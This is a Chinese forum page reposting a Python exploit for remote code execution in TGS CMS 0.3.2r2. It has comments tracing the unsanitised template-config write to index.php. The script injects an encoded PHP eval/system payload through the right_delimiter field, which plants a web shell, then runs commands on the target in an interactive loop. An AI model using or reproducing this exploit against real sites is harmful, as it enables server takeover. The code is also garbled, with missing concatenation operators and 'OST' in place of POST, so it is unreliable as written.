• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 登录 立即注册
    • 切换风格
    快捷导航
    福建二哥 门户 查看主题

    TGS CMS 0.3.2r2 Remote Code Execution Exploit

    发布者: 忻慕2619 | 发布时间: 2025-6-28 22:39| 查看数: 39| 评论数: 0|帖子模式

    # TGS CMS Remote Code Execution Exploit
    # by 0in
    # from Dark-Coders Group!
    #   www.dark-coders.pl
    # Contact: 0in(dot)email[at]gmail(dot)com
    # Greetings to:die_angel,suN8Hclf,m4r1usz,cOndemned,str0ke
    # Dork:NULL - because "You cannot kill what you did not create" <- Duality by Slipknot
    # Let's analyze the vuln:
    # We've got the: /cms/admin/admin.template_engine.php
    # first line:"<?"
    # next 2-22 lines - comments
    # 23: if ($_GET['option'] == "set_template") {
    # 24: $filename = "../index.php";
    # 25: if ((@is_writeable($filename)) && ($handle = @fopen($filename, "w"))) {
    # From 50 line to 88 we have definition of file content
    # 50: $content = '<?php // here programmer define the file to save in "../index.php"
    # but...
    # he.. don't think xD
    # 77tgs_template->template_dir    = "'.$_POST['template_dir'].'";
    # 78tgs_template->config_dir      = "'.$_POST['config_dir'].'";
    # 79tgs_template->cms_dir   = "'.$_POST['cms_dir'].'";
    # 80tgs_template->left_delimiter  = "'.$_POST['left_delimiter'].'";
    # 81tgs_template->right_delimiter = "'.$_POST['right_delimiter'].'";
    # And.. boom!
    # 89: if (@fwrite($handle,$content)) {
    # Just simply exploit for fun:
    import httplib
    import urllib
    print "TGS CMS Remote Code Execution Exploit"
    print "by 0in From Dark-Coders Group"
    print "www.dark-coders.pl"
    print 'Enter target:'
    target=raw_input()
    print 'Enter path:'
    path=raw_input()
    inject="\";error_reporting(0);eval(base64_decode(\"JGNtZD0kX0dFVFsnenVvJ107c3lzdGVtKCRjbWQpO2V4aXQ7\"));//"
    exploit=httplib.HTTPConnection(target ':80')
    headers={'Content-type':'application/x-www-form-urlencoded',"Accept":"text/plain"}
    data=urllib.urlencode({'right_delimiter':inject})
    exploit.request("OST",path "/cms/admin/admin.template_engine.php?option=set_template",data,headers)
    print exploit.getresponse().read()
    while(1):
    cmd=raw_input("[shell@" target "]#")
    if(cmd=='exit'):
    quit()
    shell=httplib.HTTPConnection(target ':80')
    shell.request("GET",path "/cms/index.php?zuo=" cmd)
    print shell.getresponse().read()


    来源:https://www.jb51.net/hack/5594.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    最新评论

    新人须知

    常见问题

    维权申诉

    关注微博

    扫描微信

    关于合作

    通讯联系

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表